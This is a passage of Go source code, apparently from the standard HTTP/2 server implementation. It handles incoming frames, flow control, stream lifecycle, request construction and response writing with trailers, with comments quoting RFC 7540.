// A client cannot push. Thus, servers MUST treat the receipt of a PUSH_PROMISE
// frame as a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
return ConnectionError(ErrCodeProtocol)
default:
sc.vlogf("http2: server ignoring frame: %v", f.Header())
return nil
}
}
func (sc *serverConn) processPing(f *PingFrame) error {
sc.serveG.check()
if f.IsAck() {
// 6.7 PING: " An endpoint MUST NOT respond to PING frames
// containing this flag."
return nil
}
if f.StreamID != 0 {
// "PING frames are not associated with any individual
// stream. If a PING frame is received with a stream
// identifier field value other than 0x0, the recipient MUST
// respond with a connection error (Section 5.4.1) of type
// PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if sc.inGoAway && sc.goAwayCode != ErrCodeNo {
return nil
}
sc.writeFrame(FrameWriteRequest{write: writePingAck{f}})
return nil
}
func (sc *serverConn) processWindowUpdate(f *WindowUpdateFrame) error {
sc.serveG.check()
switch {
case f.StreamID != 0: // stream-level flow control
state, st := sc.state(f.StreamID)
if state == stateIdle {
// Section 5.1: "Receiving any frame other than HEADERS
// or PRIORITY on a stream in this state MUST be
// treated as a connection error (Section 5.4.1) of
// type PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if st == nil {
// "WINDOW_UPDATE can be sent by a peer that has sent a
// frame bearing the END_STREAM flag. This means that a
// receiver could receive a WINDOW_UPDATE frame on a "half
// closed (remote)" or "closed" stream. A receiver MUST
// NOT treat this as an error, see Section 5.1."
return nil
}
if !st.flow.add(int32(f.Increment)) {
return streamError(f.StreamID, ErrCodeFlowControl)
}
default: // connection-level flow control
if !sc.flow.add(int32(f.Increment)) {
return goAwayFlowError{}
}
}
sc.scheduleFrameWrite()
return nil
}
func (sc *serverConn) processResetStream(f *RSTStreamFrame) error {
sc.serveG.check()
state, st := sc.state(f.StreamID)
if state == stateIdle {
// 6.4 "RST_STREAM frames MUST NOT be sent for a
// stream in the "idle" state. If a RST_STREAM frame
// identifying an idle stream is received, the
// recipient MUST treat this as a connection error
// (Section 5.4.1) of type PROTOCOL_ERROR.
return ConnectionError(ErrCodeProtocol)
}
if st != nil {
st.cancelCtx()
sc.closeStream(st, streamError(f.StreamID, f.ErrCode))
}
return nil
}
func (sc *serverConn) closeStream(st *stream, err error) {
sc.serveG.check()
if st.state == stateIdle || st.state == stateClosed {
panic(fmt.Sprintf("invariant; can't close stream in state %v", st.state))
}
st.state = stateClosed
if st.writeDeadline != nil {
st.writeDeadline.Stop()
}
if st.isPushed() {
sc.curPushedStreams--
} else {
sc.curClientStreams--
}
delete(sc.streams, st.id)
if len(sc.streams) == 0 {
sc.setConnState(http.StateIdle)
if sc.srv.IdleTimeout != 0 {
sc.idleTimer.Reset(sc.srv.IdleTimeout)
}
if h1ServerKeepAlivesDisabled(sc.hs) {
sc.startGracefulShutdownInternal()
}
}
if p := st.body; p != nil {
// Return any buffered unread bytes worth of conn-level flow control.
// See golang.org/issue/16481
sc.sendWindowUpdate(nil, p.Len())
p.CloseWithError(err)
}
st.cw.Close() // signals Handler's CloseNotifier, unblocks writes, etc
sc.writeSched.CloseStream(st.id)
}
func (sc *serverConn) processSettings(f *SettingsFrame) error {
sc.serveG.check()
if f.IsAck() {
sc.unackedSettings--
if sc.unackedSettings < 0 {
// Why is the peer ACKing settings we never sent?
// The spec doesn't mention this case, but
// hang up on them anyway.
return ConnectionError(ErrCodeProtocol)
}
return nil
}
if err := f.ForeachSetting(sc.processSetting); err != nil {
return err
}
sc.needToSendSettingsAck = true
sc.scheduleFrameWrite()
return nil
}
func (sc *serverConn) processSetting(s Setting) error {
sc.serveG.check()
if err := s.Valid(); err != nil {
return err
}
if VerboseLogs {
sc.vlogf("http2: server processing setting %v", s)
}
switch s.ID {
case SettingHeaderTableSize:
sc.headerTableSize = s.Val
sc.hpackEncoder.SetMaxDynamicTableSize(s.Val)
case SettingEnablePush:
sc.pushEnabled = s.Val != 0
case SettingMaxConcurrentStreams:
sc.clientMaxStreams = s.Val
case SettingInitialWindowSize:
return sc.processSettingInitialWindowSize(s.Val)
case SettingMaxFrameSize:
sc.maxFrameSize = int32(s.Val) // the maximum valid s.Val is < 2^31
case SettingMaxHeaderListSize:
sc.peerMaxHeaderListSize = s.Val
default:
// Unknown setting: "An endpoint that receives a SETTINGS
// frame with any unknown or unsupported identifier MUST
// ignore that setting."
if VerboseLogs {
sc.vlogf("http2: server ignoring unknown setting %v", s)
}
}
return nil
}
func (sc *serverConn) processSettingInitialWindowSize(val uint32) error {
sc.serveG.check()
// Note: val already validated to be within range by
// processSetting's Valid call.
// "A SETTINGS frame can alter the initial flow control window
// size for all current streams. When the value of
// SETTINGS_INITIAL_WINDOW_SIZE changes, a receiver MUST
// adjust the size of all stream flow control windows that it
// maintains by the difference between the new value and the
// old value."
old := sc.initialStreamSendWindowSize
sc.initialStreamSendWindowSize = int32(val)
growth := int32(val) - old // may be negative
for _, st := range sc.streams {
if !st.flow.add(growth) {
// 6.9.2 Initial Flow Control Window Size
// "An endpoint MUST treat a change to
// SETTINGS_INITIAL_WINDOW_SIZE that causes any flow
// control window to exceed the maximum size as a
// connection error (Section 5.4.1) of type
// FLOW_CONTROL_ERROR."
return ConnectionError(ErrCodeFlowControl)
}
}
return nil
}
func (sc *serverConn) processData(f *DataFrame) error {
sc.serveG.check()
if sc.inGoAway && sc.goAwayCode != ErrCodeNo {
return nil
}
data := f.Data()
// "If a DATA frame is received whose stream is not in "open"
// or "half closed (local)" state, the recipient MUST respond
// with a stream error (Section 5.4.2) of type STREAM_CLOSED."
id := f.Header().StreamID
state, st := sc.state(id)
if id == 0 || state == stateIdle {
// Section 5.1: "Receiving any frame other than HEADERS
// or PRIORITY on a stream in this state MUST be
// treated as a connection error (Section 5.4.1) of
// type PROTOCOL_ERROR."
return ConnectionError(ErrCodeProtocol)
}
if st == nil || state != stateOpen || st.gotTrailerHeader || st.resetQueued {
// This includes sending a RST_STREAM if the stream is
// in stateHalfClosedLocal (which currently means that
// the http.Handler returned, so it's done reading &
// done writing). Try to stop the client from sending
// more DATA.
// But still enforce their connection-level flow control,
// and return any flow control bytes since we're not going
// to consume them.
if sc.inflow.available() < int32(f.Length) {
return streamError(id, ErrCodeFlowControl)
}
// Deduct the flow control from inflow, since we're
// going to immediately add it back in
// sendWindowUpdate, which also schedules sending the
// frames.
sc.inflow.take(int32(f.Length))
sc.sendWindowUpdate(nil, int(f.Length)) // conn-level
if st != nil && st.resetQueued {
// Already have a stream error in flight. Don't send another.
return nil
}
return streamError(id, ErrCodeStreamClosed)
}
if st.body == nil {
panic("internal error: should have a body in this state")
}
// Sender sending more than they'd declared?
if st.declBodyBytes != -1 && st.bodyBytes+int64(len(data)) > st.declBodyBytes {
st.body.CloseWithError(fmt.Errorf("sender tried to send more than declared Content-Length of %d bytes", st.declBodyBytes))
return streamError(id, ErrCodeStreamClosed)
}
if f.Length > 0 {
// Check whether the client has flow control quota.
if st.inflow.available() < int32(f.Length) {
return streamError(id, ErrCodeFlowControl)
}
st.inflow.take(int32(f.Length))
if len(data) > 0 {
wrote, err := st.body.Write(data)
if err != nil {
return streamError(id, ErrCodeStreamClosed)
}
if wrote != len(data) {
panic("internal error: bad Writer")
}
st.bodyBytes += int64(len(data))
}
// Return any padded flow control now, since we won't
// refund it later on body reads.
if pad := int32(f.Length) - int32(len(data)); pad > 0 {
sc.sendWindowUpdate32(nil, pad)
sc.sendWindowUpdate32(st, pad)
}
}
if f.StreamEnded() {
st.endStream()
}
return nil
}
func (sc *serverConn) processGoAway(f *GoAwayFrame) error {
sc.serveG.check()
if f.ErrCode != ErrCodeNo {
sc.logf("http2: received GOAWAY %+v, starting graceful shutdown", f)
} else {
sc.vlogf("http2: received GOAWAY %+v, starting graceful shutdown", f)
}
sc.startGracefulShutdownInternal()
// http://tools.ietf.org/html/rfc7540#section-6.8
// We should not create any new streams, which means we should disable push.
sc.pushEnabled = false
return nil
}
// isPushed reports whether the stream is server-initiated.
func (st *stream) isPushed() bool {
return st.id%2 == 0
}
// endStream closes a Request.Body's pipe. It is called when a DATA
// frame says a request body is over (or after trailers).
func (st *stream) endStream() {
sc := st.sc
sc.serveG.check()
if st.declBodyBytes != -1 && st.declBodyBytes != st.bodyBytes {
st.body.CloseWithError(fmt.Errorf("request declared a Content-Length of %d but only wrote %d bytes",
st.declBodyBytes, st.bodyBytes))
} else {
st.body.closeWithErrorAndCode(io.EOF, st.copyTrailersToHandlerRequest)
st.body.CloseWithError(io.EOF)
}
st.state = stateHalfClosedRemote
}
// copyTrailersToHandlerRequest is run in the Handler's goroutine in
// its Request.Body.Read just before it gets io.EOF.
func (st *stream) copyTrailersToHandlerRequest() {
for k, vv := range st.trailer {
if _, ok := st.reqTrailer[k]; ok {
// Only copy it over it was pre-declared.
st.reqTrailer[k] = vv
}
}
}
// onWriteTimeout is run on its own goroutine (from time.AfterFunc)
// when the stream's WriteTimeout has fired.
func (st *stream) onWriteTimeout() {
st.sc.writeFrameFromHandler(FrameWriteRequest{write: streamError(st.id, ErrCodeInternal)})
}
func (sc *serverConn) processHeaders(f *MetaHeadersFrame) error {
sc.serveG.check()
id := f.StreamID
if sc.inGoAway {
// Ignore.
return nil
}
// http://tools.ietf.org/html/rfc7540#section-5.1.1
// Streams initiated by a client MUST use odd-numbered stream
// identifiers. [...] An endpoint that receives an unexpected
// stream identifier MUST respond with a connection error
// (Section 5.4.1) of type PROTOCOL_ERROR.
if id%2 != 1 {
return ConnectionError(ErrCodeProtocol)
}
// A HEADERS frame can be used to create a new stream or
// send a trailer for an open one. If we already have a stream
// open, let it process its own HEADERS frame (trailers at this
// point, if it's valid).
if st := sc.streams[f.StreamID]; st != nil {
if st.resetQueued {
// We're sending RST_STREAM to close the stream, so don't bother
// processing this frame.
return nil
}
return st.processTrailerHeaders(f)
}
// [...] The identifier of a newly established stream MUST be
// numerically greater than all streams that the initiating
// endpoint has opened or reserved. [...] An endpoint that
// receives an unexpected stream identifier MUST respond with
// a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
if id <= sc.maxClientStreamID {
return ConnectionError(ErrCodeProtocol)
}
sc.maxClientStreamID = id
if sc.idleTimer != nil {
sc.idleTimer.Stop()
}
// http://tools.ietf.org/html/rfc7540#section-5.1.2
// [...] Endpoints MUST NOT exceed the limit set by their peer. An
// endpoint that receives a HEADERS frame that causes their
// advertised concurrent stream limit to be exceeded MUST treat
// this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR
// or REFUSED_STREAM.
if sc.curClientStreams+1 > sc.advMaxStreams {
if sc.unackedSettings == 0 {
// They should know better.
return streamError(id, ErrCodeProtocol)
}
// Assume it's a network race, where they just haven't
// received our last SETTINGS update. But actually
// this can't happen yet, because we don't yet provide
// a way for users to adjust server parameters at
// runtime.
return streamError(id, ErrCodeRefusedStream)
}
initialState := stateOpen
if f.StreamEnded() {
initialState = stateHalfClosedRemote
}
st := sc.newStream(id, 0, initialState)
if f.HasPriority() {
if err := checkPriority(f.StreamID, f.Priority); err != nil {
return err
}
sc.writeSched.AdjustStream(st.id, f.Priority)
}
rw, req, err := sc.newWriterAndRequest(st, f)
if err != nil {
return err
}
st.reqTrailer = req.Trailer
if st.reqTrailer != nil {
st.trailer = make(http.Header)
}
st.body = req.Body.(*requestBody).pipe // may be nil
st.declBodyBytes = req.ContentLength
handler := sc.handler.ServeHTTP
if f.Truncated {
// Their header list was too long. Send a 431 error.
handler = handleHeaderListTooLong
} else if err := checkValidHTTP2RequestHeaders(req.Header); err != nil {
handler = new400Handler(err)
}
// The net/http package sets the read deadline from the
// http.Server.ReadTimeout during the TLS handshake, but then
// passes the connection off to us with the deadline already
// set. Disarm it here after the request headers are read,
// similar to how the http1 server works. Here it's
// technically more like the http1 Server's ReadHeaderTimeout
// (in Go 1.8), though. That's a more sane option anyway.
if sc.hs.ReadTimeout != 0 {
sc.conn.SetReadDeadline(time.Time{})
}
go sc.runHandler(rw, req, handler)
return nil
}
func (st *stream) processTrailerHeaders(f *MetaHeadersFrame) error {
sc := st.sc
sc.serveG.check()
if st.gotTrailerHeader {
return ConnectionError(ErrCodeProtocol)
}
st.gotTrailerHeader = true
if !f.StreamEnded() {
return streamError(st.id, ErrCodeProtocol)
}
if len(f.PseudoFields()) > 0 {
return streamError(st.id, ErrCodeProtocol)
}
if st.trailer != nil {
for _, hf := range f.RegularFields() {
key := sc.canonicalHeader(hf.Name)
if !ValidTrailerHeader(key) {
// TODO: send more details to the peer somehow. But http2 has
// no way to send debug data at a stream level. Discuss with
// HTTP folk.
return streamError(st.id, ErrCodeProtocol)
}
st.trailer[key] = append(st.trailer[key], hf.Value)
}
}
st.endStream()
return nil
}
func checkPriority(streamID uint32, p PriorityParam) error {
if streamID == p.StreamDep {
// Section 5.3.1: "A stream cannot depend on itself. An endpoint MUST treat
// this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR."
// Section 5.3.3 says that a stream can depend on one of its dependencies,
// so it's only self-dependencies that are forbidden.
return streamError(streamID, ErrCodeProtocol)
}
return nil
}
func (sc *serverConn) processPriority(f *PriorityFrame) error {
if sc.inGoAway {
return nil
}
if err := checkPriority(f.StreamID, f.PriorityParam); err != nil {
return err
}
sc.writeSched.AdjustStream(f.StreamID, f.PriorityParam)
return nil
}
func (sc *serverConn) newStream(id, pusherID uint32, state streamState) *stream {
sc.serveG.check()
if id == 0 {
panic("internal error: cannot create stream with id 0")
}
ctx, cancelCtx := contextWithCancel(sc.baseCtx)
st := &stream{
sc: sc,
id: id,
state: state,
ctx: ctx,
cancelCtx: cancelCtx,
}
st.cw.Init()
st.flow.conn = &sc.flow // link to conn-level counter
st.flow.add(sc.initialStreamSendWindowSize)
st.inflow.conn = &sc.inflow // link to conn-level counter
st.inflow.add(sc.srv.initialStreamRecvWindowSize())
if sc.hs.WriteTimeout != 0 {
st.writeDeadline = time.AfterFunc(sc.hs.WriteTimeout, st.onWriteTimeout)
}
sc.streams[id] = st
sc.writeSched.OpenStream(st.id, OpenStreamOptions{PusherID: pusherID})
if st.isPushed() {
sc.curPushedStreams++
} else {
sc.curClientStreams++
}
if sc.curOpenStreams() == 1 {
sc.setConnState(http.StateActive)
}
return st
}
func (sc *serverConn) newWriterAndRequest(st *stream, f *MetaHeadersFrame) (*responseWriter, *http.Request, error) {
sc.serveG.check()
rp := requestParam{
method: f.PseudoValue("method"),
scheme: f.PseudoValue("scheme"),
authority: f.PseudoValue("authority"),
path: f.PseudoValue("path"),
}
isConnect := rp.method == "CONNECT"
if isConnect {
if rp.path != "" || rp.scheme != "" || rp.authority == "" {
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
} else if rp.method == "" || rp.path == "" || (rp.scheme != "https" && rp.scheme != "http") {
// See 8.1.2.6 Malformed Requests and Responses:
//
// Malformed requests or responses that are detected
// MUST be treated as a stream error (Section 5.4.2)
// of type PROTOCOL_ERROR."
//
// 8.1.2.3 Request Pseudo-Header Fields
// "All HTTP/2 requests MUST include exactly one valid
// value for the :method, :scheme, and :path
// pseudo-header fields"
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
bodyOpen := !f.StreamEnded()
if rp.method == "HEAD" && bodyOpen {
// HEAD requests can't have bodies
return nil, nil, streamError(f.StreamID, ErrCodeProtocol)
}
rp.header = make(http.Header)
for _, hf := range f.RegularFields() {
rp.header.Add(sc.canonicalHeader(hf.Name), hf.Value)
}
if rp.authority == "" {
rp.authority = rp.header.Get("Host")
}
rw, req, err := sc.newWriterAndRequestNoBody(st, rp)
if err != nil {
return nil, nil, err
}
if bodyOpen {
if vv, ok := rp.header["Content-Length"]; ok {
req.ContentLength, _ = strconv.ParseInt(vv[0], 10, 64)
} else {
req.ContentLength = -1
}
req.Body.(*requestBody).pipe = &pipe{
b: &dataBuffer{expected: req.ContentLength},
}
}
return rw, req, nil
}
type requestParam struct {
method string
scheme, authority, path string
header http.Header
}
func (sc *serverConn) newWriterAndRequestNoBody(st *stream, rp requestParam) (*responseWriter, *http.Request, error) {
sc.serveG.check()
var tlsState *tls.ConnectionState // nil if not scheme https
if rp.scheme == "https" {
tlsState = sc.tlsState
}
needsContinue := rp.header.Get("Expect") == "100-continue"
if needsContinue {
rp.header.Del("Expect")
}
// Merge Cookie headers into one "; "-delimited value.
if cookies := rp.header["Cookie"]; len(cookies) > 1 {
rp.header.Set("Cookie", strings.Join(cookies, "; "))
}
// Setup Trailers
var trailer http.Header
for _, v := range rp.header["Trailer"] {
for _, key := range strings.Split(v, ",") {
key = http.CanonicalHeaderKey(strings.TrimSpace(key))
switch key {
case "Transfer-Encoding", "Trailer", "Content-Length":
// Bogus. (copy of http1 rules)
// Ignore.
default:
if trailer == nil {
trailer = make(http.Header)
}
trailer[key] = nil
}
}
}
delete(rp.header, "Trailer")
var url_ *url.URL
var requestURI string
if rp.method == "CONNECT" {
url_ = &url.URL{Host: rp.authority}
requestURI = rp.authority // mimic HTTP/1 server behavior
} else {
var err error
url_, err = url.ParseRequestURI(rp.path)
if err != nil {
return nil, nil, streamError(st.id, ErrCodeProtocol)
}
requestURI = rp.path
}
body := &requestBody{
conn: sc,
stream: st,
needsContinue: needsContinue,
}
req := &http.Request{
Method: rp.method,
URL: url_,
RemoteAddr: sc.remoteAddrStr,
Header: rp.header,
RequestURI: requestURI,
Proto: "HTTP/2.0",
ProtoMajor: 2,
ProtoMinor: 0,
TLS: tlsState,
Host: rp.authority,
Body: body,
Trailer: trailer,
}
req = requestWithContext(req, st.ctx)
rws := responseWriterStatePool.Get().(*responseWriterState)
bwSave := rws.bw
*rws = responseWriterState{} // zero all the fields
rws.conn = sc
rws.bw = bwSave
rws.bw.Reset(chunkWriter{rws})
rws.stream = st
rws.req = req
rws.body = body
rw := &responseWriter{rws: rws}
return rw, req, nil
}
// Run on its own goroutine.
func (sc *serverConn) runHandler(rw *responseWriter, req *http.Request, handler func(http.ResponseWriter, *http.Request)) {
didPanic := true
defer func() {
rw.rws.stream.cancelCtx()
if didPanic {
e := recover()
sc.writeFrameFromHandler(FrameWriteRequest{
write: handlerPanicRST{rw.rws.stream.id},
stream: rw.rws.stream,
})
// Same as net/http:
if shouldLogPanic(e) {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
sc.logf("http2: panic serving %v: %v\n%s", sc.conn.RemoteAddr(), e, buf)
}
return
}
rw.handlerDone()
}()
handler(rw, req)
didPanic = false
}
func handleHeaderListTooLong(w http.ResponseWriter, r *http.Request) {
// 10.5.1 Limits on Header Block Size:
// .. "A server that receives a larger header block than it is
// willing to handle can send an HTTP 431 (Request Header Fields Too
// Large) status code"
const statusRequestHeaderFieldsTooLarge = 431 // only in Go 1.6+
w.WriteHeader(statusRequestHeaderFieldsTooLarge)
io.WriteString(w, "<h1>HTTP Error 431</h1><p>Request Header Field(s) Too Large</p>")
}
// called from handler goroutines.
// h may be nil.
func (sc *serverConn) writeHeaders(st *stream, headerData *writeResHeaders) error {
sc.serveG.checkNotOn() // NOT on
var errc chan error
if headerData.h != nil {
// If there's a header map (which we don't own), so we have to block on
// waiting for this frame to be written, so an http.Flush mid-handler
// writes out the correct value of keys, before a handler later potentially
// mutates it.
errc = errChanPool.Get().(chan error)
}
if err := sc.writeFrameFromHandler(FrameWriteRequest{
write: headerData,
stream: st,
done: errc,
}); err != nil {
return err
}
if errc != nil {
select {
case err := <-errc:
errChanPool.Put(errc)
return err
case <-sc.doneServing:
return errClientDisconnected
case <-st.cw:
return errStreamClosed
}
}
return nil
}
// called from handler goroutines.
func (sc *serverConn) write100ContinueHeaders(st *stream) {
sc.writeFrameFromHandler(FrameWriteRequest{
write: write100ContinueHeadersFrame{st.id},
stream: st,
})
}
// A bodyReadMsg tells the server loop that the http.Handler read n
// bytes of the DATA from the client on the given stream.
type bodyReadMsg struct {
st *stream
n int
}
// called from handler goroutines.
// Notes that the handler for the given stream ID read n bytes of its body
// and schedules flow control tokens to be sent.
func (sc *serverConn) noteBodyReadFromHandler(st *stream, n int, err error) {
sc.serveG.checkNotOn() // NOT on
if n > 0 {
select {
case sc.bodyReadCh <- bodyReadMsg{st, n}:
case <-sc.doneServing:
}
}
}
func (sc *serverConn) noteBodyRead(st *stream, n int) {
sc.serveG.check()
sc.sendWindowUpdate(nil, n) // conn-level
if st.state != stateHalfClosedRemote && st.state != stateClosed {
// Don't send this WINDOW_UPDATE if the stream is closed
// remotely.
sc.sendWindowUpdate(st, n)
}
}
// st may be nil for conn-level
func (sc *serverConn) sendWindowUpdate(st *stream, n int) {
sc.serveG.check()
// "The legal range for the increment to the flow control
// window is 1 to 2^31-1 (2,147,483,647) octets."
// A Go Read call on 64-bit machines could in theory read
// a larger Read than this. Very unlikely, but we handle it here
// rather than elsewhere for now.
const maxUint31 = 1<<31 - 1
for n >= maxUint31 {
sc.sendWindowUpdate32(st, maxUint31)
n -= maxUint31
}
sc.sendWindowUpdate32(st, int32(n))
}
// st may be nil for conn-level
func (sc *serverConn) sendWindowUpdate32(st *stream, n int32) {
sc.serveG.check()
if n == 0 {
return
}
if n < 0 {
panic("negative update")
}
var streamID uint32
if st != nil {
streamID = st.id
}
sc.writeFrame(FrameWriteRequest{
write: writeWindowUpdate{streamID: streamID, n: uint32(n)},
stream: st,
})
var ok bool
if st == nil {
ok = sc.inflow.add(n)
} else {
ok = st.inflow.add(n)
}
if !ok {
panic("internal error; sent too many window updates without decrements?")
}
}
// requestBody is the Handler's Request.Body type.
// Read and Close may be called concurrently.
type requestBody struct {
stream *stream
conn *serverConn
closed bool // for use by Close only
sawEOF bool // for use by Read only
pipe *pipe // non-nil if we have a HTTP entity message body
needsContinue bool // need to send a 100-continue
}
func (b *requestBody) Close() error {
if b.pipe != nil && !b.closed {
b.pipe.BreakWithError(errClosedBody)
}
b.closed = true
return nil
}
func (b *requestBody) Read(p []byte) (n int, err error) {
if b.needsContinue {
b.needsContinue = false
b.conn.write100ContinueHeaders(b.stream)
}
if b.pipe == nil || b.sawEOF {
return 0, io.EOF
}
n, err = b.pipe.Read(p)
if err == io.EOF {
b.sawEOF = true
}
if b.conn == nil && inTests {
return
}
b.conn.noteBodyReadFromHandler(b.stream, n, err)
return
}
// responseWriter is the http.ResponseWriter implementation. It's
// intentionally small (1 pointer wide) to minimize garbage. The
// responseWriterState pointer inside is zeroed at the end of a
// request (in handlerDone) and calls on the responseWriter thereafter
// simply crash (caller's mistake), but the much larger responseWriterState
// and buffers are reused between multiple requests.
type responseWriter struct {
rws *responseWriterState
}
// Optional http.ResponseWriter interfaces implemented.
var (
_ http.CloseNotifier = (*responseWriter)(nil)
_ http.Flusher = (*responseWriter)(nil)
_ stringWriter = (*responseWriter)(nil)
)
type responseWriterState struct {
// immutable within a request:
stream *stream
req *http.Request
body *requestBody // to close at end of request, if DATA frames didn't
conn *serverConn
// TODO: adjust buffer writing sizes based on server config, frame size updates from peer, etc
bw *bufio.Writer // writing to a chunkWriter{this *responseWriterState}
// mutated by http.Handler goroutine:
handlerHeader http.Header // nil until called
snapHeader http.Header // snapshot of handlerHeader at WriteHeader time
trailers []string // set in writeChunk
status int // status code passed to WriteHeader
wroteHeader bool // WriteHeader called (explicitly or implicitly). Not necessarily sent to user yet.
sentHeader bool // have we sent the header frame?
handlerDone bool // handler has finished
dirty bool // a Write failed; don't reuse this responseWriterState
sentContentLen int64 // non-zero if handler set a Content-Length header
wroteBytes int64
closeNotifierMu sync.Mutex // guards closeNotifierCh
closeNotifierCh chan bool // nil until first used
}
type chunkWriter struct{ rws *responseWriterState }
func (cw chunkWriter) Write(p []byte) (n int, err error) { return cw.rws.writeChunk(p) }
func (rws *responseWriterState) hasTrailers() bool { return len(rws.trailers) != 0 }
// declareTrailer is called for each Trailer header when the
// response header is written. It notes that a header will need to be
// written in the trailers at the end of the response.
func (rws *responseWriterState) declareTrailer(k string) {
k = http.CanonicalHeaderKey(k)
if !ValidTrailerHeader(k) {
// Forbidden by RFC 2616 14.40.
rws.conn.logf("ignoring invalid trailer %q", k)
return
}
if !strSliceContains(rws.trailers, k) {
rws.trailers = append(rws.trailers, k)
}
}
// writeChunk writes chunks from the bufio.Writer. But because
// bufio.Writer may bypass its chunking, sometimes p may be
// arbitrarily large.
//
// writeChunk is also responsible (on the first chunk) for sending the
// HEADER response.
func (rws *responseWriterState) writeChunk(p []byte) (n int, err error) {
if !rws.wroteHeader {
rws.writeHeader(200)
}
isHeadResp := rws.req.Method == "HEAD"
if !rws.sentHeader {
rws.sentHeader = true
var ctype, clen string
if clen = rws.snapHeader.Get("Content-Length"); clen != "" {
rws.snapHeader.Del("Content-Length")
clen64, err := strconv.ParseInt(clen, 10, 64)
if err == nil && clen64 >= 0 {
rws.sentContentLen = clen64
} else {
clen = ""
}
}
if clen == "" && rws.handlerDone && bodyAllowedForStatus(rws.status) && (len(p) > 0 || !isHeadResp) {
clen = strconv.Itoa(len(p))
}
_, hasContentType := rws.snapHeader["Content-Type"]
if !hasContentType && bodyAllowedForStatus(rws.status) {
ctype = http.DetectContentType(p)
}
var date string
if _, ok := rws.snapHeader["Date"]; !ok {
// TODO(bradfitz): be faster here, like net/http? measure.
date = time.Now().UTC().Format(http.TimeFormat)
}
for _, v := range rws.snapHeader["Trailer"] {
foreachHeaderElement(v, rws.declareTrailer)
}
endStream := (rws.handlerDone && !rws.hasTrailers() && len(p) == 0) || isHeadResp
err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{
streamID: rws.stream.id,
httpResCode: rws.status,
h: rws.snapHeader,
endStream: endStream,
contentType: ctype,
contentLength: clen,
date: date,
})
if err != nil {
rws.dirty = true
return 0, err
}
if endStream {
return 0, nil
}
}
if isHeadResp {
return len(p), nil
}
if len(p) == 0 && !rws.handlerDone {
return 0, nil
}
if rws.handlerDone {
rws.promoteUndeclaredTrailers()
}
endStream := rws.handlerDone && !rws.hasTrailers()
if len(p) > 0 || endStream {
// only send a 0 byte DATA frame if we're ending the stream.
if err := rws.conn.writeDataFromHandler(rws.stream, p, endStream); err != nil {
rws.dirty = true
return 0, err
}
}
if rws.handlerDone && rws.hasTrailers() {
err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{
streamID: rws.stream.id,
h: rws.handlerHeader,
trailers: rws.trailers,
endStream: true,
})
if err != nil {
rws.dirty = true
}
return len(p), err
}
return len(p), nil
}
// TrailerPrefix is a magic prefix for ResponseWriter.Header map keys
// that, if present, signals that the map entry is actually for
// the response trailers, and not the response headers. The prefix
// is stripped after the ServeHTTP call finishes and the values are
// sent in the trailers.
//
// This mechanism is intended only for trailers that are not known
// prior to the headers being written. If the set of trailers is fixed
// or known before the header is written, the normal Go trailers mechanism
// is preferred:
// https://golang.org/pkg/net/http/#ResponseWriter
// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
const TrailerPrefix = "Trailer:"
// promoteUndeclaredTrailers permits http.Handlers to set trailers
// after the header has already been flushed. Because the Go
// ResponseWriter interface has no way to set Trailers (only the
// Header), and because we didn't want to expand the ResponseWriter
// interface, and because nobody used trailers, and because RFC 2616
// says you SHOULD (but not must) predeclare any trailers in the
// header, the official ResponseWriter rules said trailers in Go must
// be predeclared, and then we reuse the same ResponseWriter.Header()
// map to mean both Headers and Trailers. When it's time to write the
// Trailers, we pick out the fields of Headers that were declared as
// trailers. That worked for a while, until we found the first major
// user of Trailers in the wild: gRPC (using them only over http2),
// and gRPC libraries permit setting trailers mid-stream without
// predeclarnig them. So: change of plans. We still permit the old
// way, but we also permit this hack: if a Header() key begins with
// "Trailer:", the suffix of that key is a Trailer. Because ':' is an
// invalid token byte anyway, there is no ambiguity. (And it's already
// filtered out) It's mildly hacky, but not terrible.
//
// This method runs after the Handler is done and promotes any Header
// fields to be trailers.
func (rws *responseWriterState) promoteUndeclaredTrailers() {
for k, vv := range rws.handlerHeader {
if !strings.HasPrefix(k, TrailerPrefix) {
continue
}
trailerKey := strings.TrimPrefix(k, TrailerPrefix)
rws.declareTrailer(trailerKey)
rws.handlerHeader[http.CanonicalHeaderKey(trailerKey)] = vv
}
if len(rws.trailers) > 1 {
sorter := sorterPool.Get().(*sorter)
sorter.SortStrings(rws.trailers)
sorterPool.Put(sorter)
}
}
func (w *responseWriter) Flush() {
rws := w.rws
if rws == nil {
panic("Header called after Handler finished")
}
if rws.bw.Buffered() > 0 {
if err := rws.bw.Flush(); err != nil {
// Ignore the error. The frame writer already knows.
return
}
} else {
// The bufio.Writer won't call chunkWriter.Write
// (writeChunk with zero bytes, so we have to do it
// ourselves to force the HTTP response header and/or
// final DATA frame (with END_STREAM) to be sent.
rws.writeChunk(nil)
}
}
func (w *responseWriter) CloseNotify() <-chan bool {
rws := w.rws
if rws == nil {
panic("CloseNotify called after Handler finished")
}
rws.closeNotifierMu.Lock()
ch := rws.closeNotifierCh
if ch == nil {
ch = make(chan bool, 1)
rws.closeNotifierCh = ch
cw := rws.stream.cw
go func() {
cw.Wait() // wait for close
ch <- true
}()
}
rws.closeNotifierMu.Unlock()
return ch
}
func (w *responseWriter) Header() http.Header {
rws := w.rws
if rws == nil {
panic("Header called after Handler finished")
}
if rws.handlerHeader == nil {
rws.handlerHeader = make(http.Header)
}
return rws.handlerHeader
}
func (w *responseWriter) WriteHeader(code int) {
rws := w.rws
if rws == nil {
panic("WriteHeader called after Handler finished")
}
rws.writeHeader(code)
}
func (rws *responseWriterState) writeHeader(code int) {
if !rws.wroteHeader {
rws.wroteHeader = true
rws.status = code
if len(rws.handlerHeader) > 0 {
rws.snapHeader = cloneHeader(rws.handlerHeader)
}
}
}
func cloneHeader(h http.Header) http.Header {
h2 := make(http.Header, len(h))
for k, vv := range h {
vv2 := make([]string, len(vv))
copy(vv2, vv)
h2[k] = vv2
}
return h2
}
// The Life Of A Write is like this:
//
// * Handler calls w.Write or w.WriteString ->
